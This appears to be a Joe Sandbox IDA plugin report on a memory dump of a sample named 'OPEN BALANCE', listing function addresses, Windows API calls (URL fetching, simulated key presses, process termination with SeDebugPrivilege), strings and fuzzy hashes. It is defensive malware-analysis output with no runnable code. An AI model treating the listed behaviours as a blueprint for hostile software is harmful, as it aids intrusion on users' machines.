Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: 2bbc3725f17c5acc1fa0930173ae50d43efa1ceda2157ce9380bdaec360d2a5c
Instruction ID: 69e04138d8c651bb519dc26d4e6a6fac750a413141ca8c713e31dd53e2e1e5d9
Opcode Fuzzy Hash: 2bbc3725f17c5acc1fa0930173ae50d43efa1ceda2157ce9380bdaec360d2a5c
Instruction Fuzzy Hash: 33518970600209EFDB209F24CC51BAA7BBAFB48361F144619F952E62A0EB70E994DB41

Function 008BC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008BC182
GetLastError.KERNEL32 ref: 008BC195
SetEvent.KERNEL32(?), ref: 008BC1A9

Part of subcall function 008BC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008BC272
Part of subcall function 008BC253: GetLastError.KERNEL32 ref: 008BC322
Part of subcall function 008BC253: SetEvent.KERNEL32(?), ref: 008BC336
Part of subcall function 008BC253: InternetCloseHandle.WININET(00000000), ref: 008BC341

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 3fe5bb9505b62855bec05db7f9076bbe29ae2c843b7913666012001d9640af51
Instruction ID: e661c25c1638b671f6578533be6cf89fcab37f9994d1a169b769187250ce319f
Opcode Fuzzy Hash: 3fe5bb9505b62855bec05db7f9076bbe29ae2c843b7913666012001d9640af51
Instruction Fuzzy Hash: 93319C71201606AFDB219FA9DC44ABBBBF9FF58300B00452EF95AC6710DB30E814DBA0

Function 008A25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 008A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008A3A57
Part of subcall function 008A3A3D: GetCurrentThreadId.KERNEL32 ref: 008A3A5E
Part of subcall function 008A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008A25B3), ref: 008A3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 008A25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008A25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008A25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 008A25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008A2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 008A2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 008A260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008A2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 008A2627

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: f7432e025b7802233e664b5e6709488633b0d14e5194bf36e9b59d2bb26baf23
Instruction ID: 57ac101d625ab1d88a12ab0c6b57b1d2ef6f6a9d30a0fc75e80c9ccc1a6847b1
Opcode Fuzzy Hash: f7432e025b7802233e664b5e6709488633b0d14e5194bf36e9b59d2bb26baf23
Instruction Fuzzy Hash: DE01B130690624BBFF2067689C8AF593F59FB5AB12F100106F318AE0D1C9E26444CA6A

Function 008A1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,008A1449,?,?,00000000), ref: 008A180C
RtlAllocateHeap.NTDLL(00000000,?,008A1449), ref: 008A1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008A1449,?,?,00000000), ref: 008A1828
GetCurrentProcess.KERNEL32(?,00000000,?,008A1449,?,?,00000000), ref: 008A1830
DuplicateHandle.KERNEL32(00000000,?,008A1449,?,?,00000000), ref: 008A1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008A1449,?,?,00000000), ref: 008A1843
GetCurrentProcess.KERNEL32(008A1449,00000000,?,008A1449,?,?,00000000), ref: 008A184B
DuplicateHandle.KERNEL32(00000000,?,008A1449,?,?,00000000), ref: 008A184E
CreateThread.KERNEL32(00000000,00000000,008A1874,00000000,00000000,00000000), ref: 008A1868

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: 50c28cafa9333075d04638ae82a0695c36bd13bf72e291543e771de18e8d30f7
Instruction ID: d1bdacc3757dabd92a392a71a2f41a2c96b528ba6feb997a19782a2057fbf61e
Opcode Fuzzy Hash: 50c28cafa9333075d04638ae82a0695c36bd13bf72e291543e771de18e8d30f7
Instruction Fuzzy Hash: 6201BBB5281319BFEB10ABA5DC4DF6B7BACFB89B11F004511FA05DB2A1CA749800CB20

Function 008CA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 008AD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 008AD501
Part of subcall function 008AD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 008AD50F
Part of subcall function 008AD4DC: CloseHandle.KERNEL32(00000000), ref: 008AD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 008CA16D
GetLastError.KERNEL32 ref: 008CA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 008CA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 008CA268
GetLastError.KERNEL32(00000000), ref: 008CA273
CloseHandle.KERNEL32(00000000), ref: 008CA2C4

Strings

SeDebugPrivilege, xrefs: 008CA18F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e5bf947160bcdc8997c4cd8830e01f71eb21dfdede0514caeee8114108ba4ed2
Instruction ID: a0c524ff4b55c1ba106462a5e25de3597571e1c324cb31a728bcb3d1361f328a
Opcode Fuzzy Hash: e5bf947160bcdc8997c4cd8830e01f71eb21dfdede0514caeee8114108ba4ed2
Instruction Fuzzy Hash: 22618B702092569FD724DF18C494F16BBA5FF4431CF18848DE4668BBA2C776EC49CB92

Function 008D3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008D3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 008D393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008D3954
_wcslen.LIBCMT ref: 008D3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 008D39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 008D39F4

Strings

SysListView32, xrefs: 008D38F7

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 5f4fb6e41f8d8c5c2e82b33a00d1f86fbc6f994cb1d0d92dfe9293e6fc254ed2
Instruction ID: a9cbaf696b6ab13808b6a62f59d03f25d933539a8722c7b9b3ff48f2bbb3a5dc
Opcode Fuzzy Hash: 5f4fb6e41f8d8c5c2e82b33a00d1f86fbc6f994cb1d0d92dfe9293e6fc254ed2
Instruction Fuzzy Hash: 73418271A00219BBEF219F64CC45BEA7BA9FF08354F100626F958E7281D771D994CB91

Function 008ABC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008ABCFD
IsMenu.USER32(00000000), ref: 008ABD1D
CreatePopupMenu.USER32 ref: 008ABD53
GetMenuItemCount.USER32(01502718), ref: 008ABDA4
InsertMenuItemW.USER32(01502718,?,00000001,00000030), ref: 008ABDCC

Strings

0, xrefs: 008ABCA8
2, xrefs: 008ABD37

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: fec8c9c68c83954f8216eb04ad7cb2ccfa2e8a9285fe728ec3fdfa2536071aa3
Instruction ID: e05d6d42730bb1078c5f3446efb5bfad655b6c15988d91fe92f6d6bd4b519092
Opcode Fuzzy Hash: fec8c9c68c83954f8216eb04ad7cb2ccfa2e8a9285fe728ec3fdfa2536071aa3
Instruction Fuzzy Hash: 0C519E70A002099BEF10DFB8D884BAEBBF4FF46354F14425AE511EB692E7709D41CB62

Function 008AC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 008AC913

Strings

info, xrefs: 008AC8B4
stop, xrefs: 008AC8E4
warning, xrefs: 008AC8FC
question, xrefs: 008AC8CC
blank, xrefs: 008AC895

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 533311565f49e502fdb5463f924a6cc4d923e64c45a4e451acd6cd649fea67ee
Instruction ID: 55bee6b7ae9fba9d0d4b88616ec93744ca2edc4d8a623468847034684a6d94a7
Opcode Fuzzy Hash: 533311565f49e502fdb5463f924a6cc4d923e64c45a4e451acd6cd649fea67ee
Instruction Fuzzy Hash: 6211EB3668930ABEF7015B549C83DAF6BDCFF17759B14002EF500E66C2E7A45D005265

Function 008AED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 008AED2A
_wcslen.LIBCMT ref: 008AED3B
_wcslen.LIBCMT ref: 008AED79
_wcslen.LIBCMT ref: 008AEDAF
_wcslen.LIBCMT ref: 008AEDDF
_wcslen.LIBCMT ref: 008AEDEF
_wcslen.LIBCMT ref: 008AEE2B
_wcslen.LIBCMT ref: 008AEE5A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 4215f8de3f843c545e4c2a1b7b989161352452cb2d4723ef3389586711f44ddf
Instruction ID: 2b160c2105deb88602216fdef3ed7b4d70f6c6d85ea371dae3e00088477ee753
Opcode Fuzzy Hash: 4215f8de3f843c545e4c2a1b7b989161352452cb2d4723ef3389586711f44ddf
Instruction Fuzzy Hash: B441C365D1021875DB11EBF8CC8A9CFB7A8FF46310F518862E518E3621FB34E255C3A6

Function 0085F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0089682C,00000004,00000000,00000000), ref: 0085F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0089682C,00000004,00000000,00000000), ref: 0089F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0089682C,00000004,00000000,00000000), ref: 0089F454

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d8afda0fbe966eb8bfe25b7cbfbdfcc008749b58aa0b011ff43ab087def4c048
Instruction ID: 399468ce51a6540ddd8964f849e616819c117fa9a8db2a2cf569414472961286
Opcode Fuzzy Hash: d8afda0fbe966eb8bfe25b7cbfbdfcc008749b58aa0b011ff43ab087def4c048
Instruction Fuzzy Hash: F3414031208A40BECB3C9B2CC88876A7FD1FB56356F58413DEB47D2663C6319488DB11

Function 008D2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 008D2D1B
GetDC.USER32(00000000), ref: 008D2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008D2D2E
ReleaseDC.USER32(00000000,00000000), ref: 008D2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008D2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008D2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008D5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 008D2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008D2DE1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e13fbd1b7cb8bca7a819f03eddd790884783b693b17d9d236a723f3d71f3228a
Instruction ID: f1e166a70debe16cdce882ccf885e4d6287d27932ce6dd7aeb901159a2bff972
Opcode Fuzzy Hash: e13fbd1b7cb8bca7a819f03eddd790884783b693b17d9d236a723f3d71f3228a
Instruction Fuzzy Hash: 25319C72202214BFEB118F54DC8AFEB3BA9FF19711F044256FE08DA291C6759C40CBA0

Function 008A5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 008A5637
_memcmp.LIBVCRUNTIME ref: 008A5659
_memcmp.LIBVCRUNTIME ref: 008A5671
_memcmp.LIBVCRUNTIME ref: 008A5684
_memcmp.LIBVCRUNTIME ref: 008A569E
_memcmp.LIBVCRUNTIME ref: 008A56B1
_memcmp.LIBVCRUNTIME ref: 008A56C9
_memcmp.LIBVCRUNTIME ref: 008A56E4

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b9d0503769c8dee7870105c4cf6f5ab3c55733647cac24de964b4349748af6a2
Instruction ID: 098eecef112afa43631b06b255113903bbec2c2abb21b32b1ee24a4a7b6281c2
Opcode Fuzzy Hash: b9d0503769c8dee7870105c4cf6f5ab3c55733647cac24de964b4349748af6a2
Instruction Fuzzy Hash: 0921A761640A19B7F61855248F82FFA335CFF32394F484021FE16DAF82F728ED6095A6

Function 008C4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 008C5007
NULL Pointer assignment, xrefs: 008C502E, 008C5383

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 200ac4b208998fd6e44c3ddc7b8d7d0f55dd866ba31a2d646c3b2429966372da
Instruction ID: 4a5987af420713e82bfdf8bec9ec91c2ec8dfcefe3b869ba73d4dcbc8fa66ea7
Opcode Fuzzy Hash: 200ac4b208998fd6e44c3ddc7b8d7d0f55dd866ba31a2d646c3b2429966372da
Instruction Fuzzy Hash: 9AD17C71A0060A9FDF10CFA8C885FAEB7B5FB48354F14816DE915EB281E770E985CB90

Function 00881522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,008817FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 008815CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00881651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,008817FB,?,008817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008816E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008816FB

Part of subcall function 00873820: RtlAllocateHeap.NTDLL(00000000,?,00911444), ref: 00873852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,008817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00881777
__freea.LIBCMT ref: 008817A2
__freea.LIBCMT ref: 008817AE

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 6712310dee4e92ec0f2bfffd4fee49fffd66982e24adc06471aeffda48e48032
Instruction ID: 48e54ac86fa0d9133bec05092b12f7d7a7ff3a2373b9455676c96600559f995f
Opcode Fuzzy Hash: 6712310dee4e92ec0f2bfffd4fee49fffd66982e24adc06471aeffda48e48032
Instruction Fuzzy Hash: CD91C371E0021A9ADF20AE64CC89AEE7BB9FF49314F184659E805E7145DF35DC42CB61

Function 008C4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008C4648
VariantInit.OLEAUT32(?), ref: 008C4749
VariantClear.OLEAUT32(?), ref: 008C4753
VariantClear.OLEAUT32(?), ref: 008C47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 008C472C
Null Object assignment in FOR..IN loop, xrefs: 008C45D8, 008C4706, 008C47BE

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
